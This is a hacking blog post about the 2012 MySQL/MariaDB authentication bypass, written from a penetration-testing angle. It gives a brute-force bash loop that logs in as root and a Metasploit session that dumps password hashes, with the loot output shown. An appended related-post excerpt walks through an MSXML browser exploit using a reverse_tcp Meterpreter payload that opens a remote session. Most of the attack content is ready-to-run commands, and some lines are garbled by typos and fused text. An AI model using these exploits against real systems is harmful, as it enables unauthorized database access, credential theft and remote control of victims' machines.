The news about the vulnerability in MySQL and MariaDB spreads like a
wild fire. I have covered about this vulnerability in E Hacking news as
news article. Here, i am going to share the same thing from the
perspective of a penetration tester.
The MySQL and MariaDB versions 5.161,5.2.11,5.3.5 and 5.5.c2 are affected version.
The vulnerability allows an attacker to access MySQL database without
inputing proper authentication credentials. The vulnerability can only
exploited if MySQL was built on a system where the memcmp() function can
return values outside the -128 to 127 range.
According to Gokubchik the gcc build in memcmp and BSD libc are safe bu the linux glibc sse-optimised memcmp is not safe.
Not all linux distros are affected, only the following systems are vulnerable:
*ubuntu linux 64 bit(10.04,11.10,11.04,12.04)
*openSUSE 12.1 64 bit MySQL 5.5.23-log
*Debin Unstable 64 bit 5.5.23.2
*Fedora
*Arch Linux
In order to test the vulnerability, run the followoing bash script:
for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.12>/dev/null; done
The above code will provide access to an affectte MySQL Server as the root user account.
The following video is provided by one of EHN reader:
Exploiting using Metasploit :
one of metasploit contributor committee a
threaded brute-force module that abuses the authentication bypass flaw to automatically dump the password database.
A quick demonstration of this module is shown below using the latest Metasploit Framework GIT/SVN snapshot.:
$ msfconsole
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root
msf auxiliary(mysql_authbypass_hashdump) > set RHOSTS 127.0.0.1
msf auxiliary(mysql_authbypass_hashdump) > run
[+] 127.0.0.1:3306The server allows logins, proceeding with bypass test
[*] 127.0.0.1:3306Authentication bypass is 10% complete
[*] 127.0.0.1:3306Authentication bypass is 20% complete
[*] 127.0.0.1:3306Successfully bypassed authentication after 205 attempts
[+] 127.0.0.1:3306Successful exploited the authentication bypass flaw, dumping hashes...
[+] 127.0.0.1:3306Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306Saving HashString as Loot: root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306Saving HashString as Loot: debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89
[*] 127.0.0.1:3306Hash Table has been saved: 20120611013537_default_127.0.0.1_mysql.hashes_889573.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Related Posts
192.168.56.12:1565) Type "sessions" to list the active sessions . Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Type "sysinfo" in the meterpreter to get the system information." href="https://elit-hackers.blogspot.com/2012/07/cve-2012-1889-microsoft-xml-core_30.html">CVE-2012-1889: Microsoft XML Core Services Vulnerability A vulnerability in Microsoft XML Core Services 3.0, 4.0, 5.0, and 6.0 allows remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker would have no way to force users to visit such a website. Instead, an attacker would have to convince users to visit the website, typically by getting them to click a link in an email message or Instant Messenger message that takes them to the attacker's website. The vulnerability affects all supported releases of Microsoft Windows, and all supported editions of Microsoft Office 2003 and Microsoft Office 2007. Here you can the full list. The vulnerability exists when MSXML attempts to access an object in memory that has not been initialized, which may corrupt memory in such a way that an attacker could execute arbitrary code in the context of the logged-on user. I am going to demonstrate how to use Metasploit tool for testing whether your network vulnerable or not. Open the Terminal and type "msfupdate" to get the latest metasploit modules. Once update is finished, then type "msfconsole". Then type the following command in the console "use exploit/windows/browser/msxml_get_definition_code_exec". Now we have to know the list of settings available for this exploit module. In order to get the list , you can type "show options" in the console. Command: set SRVHOST 192.168.56.10 Details: Here the 192.168.56.11 is the ip of Backtrack . You can get this ip by simply typing the "ifconfig" in the terminal. Command: set lhost 192.168.56.10 Command: set URIPATH / Details: The path in which our exploit will run. As usual, we can use Reverse Tcp payload for this attack also. So type the following command in the Metasploit console: set payload windows/meterpreter/reverse_tcp Type "exploit" in the console. Once the victim loads the URL in his IE browser, you will get the following message in your metasploit console: [*] msxml_get_definition_code_exec - Using msvcrt ROP [*] msxml_get_definition_code_exec - 10.0.1.79:1564 - Sending html [*] Sending stage (752128 bytes) to 192.168.56.12 [*] Meterpreter session 1 opened (192.168.56.10:4444 -> 192.168.56.12:1565) Type "sessions" to list the active sessions . Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Type "sysinfo" in the meterpreter to get the system information. 
Please try to comment if i have done well or if you have finished learning from the blog
EmoticonEmoticon